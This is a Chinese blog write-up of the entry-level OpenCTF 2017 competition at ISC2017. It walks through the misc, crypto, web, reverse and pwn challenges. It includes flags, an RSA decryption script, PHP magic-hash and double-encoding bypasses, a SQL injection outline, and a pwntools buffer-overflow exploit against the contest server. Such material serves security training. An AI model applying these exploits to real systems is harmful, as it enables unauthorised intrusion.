ISC2017极客嘉年华 —— OpenCTF 2017 WriteUp -impakho 的小站

OpenCTF 2017是ISC2017现场展位活动“极客密室第一关”

难度为入门级别，较简单，有几道是XMAN 2017夏令营选拔赛和其它CTF赛事原题

zip (Misc100)

Hint：Ziperello，纯数字

可以用 ARCHPR 或者 Ziperello 破解得到压缩包密码：88888888，解压得到flag

XCTF{ke&cVR3OHWHx42ZygOceozE6KIxz1Zzj}

pcap (Misc100)

Hint：wireshark，tcp，urldecode

使用WireShark过滤TCP，看到有HTTP请求，GET /?q=XCTF%7BRSUJecDZ5xFp1z1X%26Nmpt%40PZSDQ%25Gbx6%7D HTTP/1.1\r\n，urldecode后得到flag

XCTF{RSUJecDZ5xFp1z1X&Nmpt@PZSDQ%Gbx6}

Maya Cipher (Crypto100)

题目：耗子哥哥在美洲冒险时，帮助了最后一位玛雅人后裔。为了报答耗子哥哥，玛雅人后裔留给他一张预言的纸条。玛雅人的预言到底是什么呢？ Hint：Maya numerals

根据提示，把玛雅数字改写为阿拉伯数字

5 8 4 3 5 4 4 6 7 11
3 2 3 0 3 1 3 8 5 15
6 9 7 3 5 15 6 3 6 15
6 13 6 9 6 14 6 7 7 13

发现最大数字为15，猜测可以用16进制表示，改写成16进制表示

5 8 4 3 5 4 4 6 7 B
3 2 3 0 3 1 3 8 5 F
6 9 7 3 5 F 6 3 6 F
6 D 6 9 6 E 6 7 7 D

去除空格和换行，得到584354467B323031385F69735F636F6D696E677D，进行ASCII转换得到flag

XCTF{2018_is_coming}

RSA (Crypto100)

题目：Welcome To The Openctf 2017,The c, p, q, and e are parameters for the RSA algorithm.

p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
e = 65537
c = 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406

参考资料：【技术分享】CTF中RSA的常见攻击方法

写个RSA解密脚本，跑一下就得到flag

坑：flag是RSA解密后的10进制数字

#!/usr/bin/env python
# encoding: utf-8

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

def main():
    p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
    q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
    e = 65537
    c = 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406
    n = p * q
    d = modinv(e, (p-1)*(q-1))
    m = pow(c, d, n)
    print ("flag: %d" % m)

if __name__ == "__main__":
    main()

flag: 554035859905981120888026046266284028688068004006280022208626

jsjs (Web100)

题目：http://202.112.51.184:8101/ Hint：禁用javascript

通过浏览器菜单（右键、F12无效）打开开发者工具，查看网页源代码，即可得到flag

XCTF{_O0oo0O_js_is_FUNNY!}

variacover (Web100)

题目：http://202.112.51.184:8103/ Hint：parse_str()函数会把参数字符串当做php变量解析

这题考察 php弱类型的知识，md5('QNKCDZO') == "0e830400451993494058024219903391" == 0e830400451993494058024219903391 == 0，问题出在0e开头==0，所以找到一个md5值也为0e开头的字符串即可，比如s878926199a。

构造URL：http://202.112.51.184:8103/?id=a[0]=s878926199a

XCTF{sTr_covcderd_AND_you_kn0W?}

urldecode (Web100)

题目：http://202.112.51.184:8102/ Hint：服务器会对参数进行解码，urldecode()会再解码一次

贴个自己写的源代码：

<meta charset="utf-8">
<?
error_reporting(0);
if ($_GET['id'] == ""){
    echo "请给id赋值";
    exit();
}
if (eregi("OPENCTF", $_GET['id'])){
    echo "你距离flag只有1厘米!<?php tips: urldecode是一个php的函数>";
    exit();
}else{
    echo "你是来参加什么比赛的？";
}

$_GET['id'] = urldecode($_GET['id']);
if ($_GET['id'] == "OPENCTF"){
  echo "<h1>XCTF{UrlDeCode_oL_yOu_lol!} </h1>";
}

这题考查二次编码的知识，构造URL：http://202.112.51.184:8102/?id=%254FPENCTF

坑：id:OPENCTF，全部字符都需要大写

XCTF{UrlDeCode_oL_yOu_lol!}

SQL注入 (Web100)

题目：http://202.112.51.184:8201/

试了一下，表中存在id:1;id:2

默认输出错误信息，用 Polygon() 注入可爆出，数据库名：security；表名：article；字段名：id

简单构造注入语句，即可得到flag

XCTF{ut9x2a5f8t9e6s3a4g5j}

OpenReverse (Reverse100)

Hint：动态OD调试

使用 Ollydbg 动态调试，在00401147处设置断点，运行

随便输入Key，程序停在断点处，在内存中可以看到flag

XCTF{5eacs6y8p1o9gitc9521}

blind (Pwn100)

题目：nc 202.112.51.184 8301 Hint: 72位junk

返回一个内存地址，而且每次返回都是同一个。

根据提示构造72位junk，然后用返回的内存地址覆盖EIP

#!/usr/bin/env python
# encoding: utf-8

from pwn import *

p = remote('202.112.51.184', 8301)
junk = 'A' * 72
payload = junk + p64(0x40060d)
p.sendline(payload)
print (p.recvall())
p.close()

XCTF{sQ^yeLZKBVkoZ7^zOtigV5xsepBY&bB7}

getshell (Pwn100)

题目：nc 202.112.51.184 8302

有原题，不解释。原题WriteUp：https://github.com/ernw/ctf-writeups/tree/master/csaw2016/aul

XCTF{q0Cr1iwqlWW1m8ejiK0z9JUa1gq@n&}

ISC2017极客嘉年华 —— OpenCTF 2017 WriteUp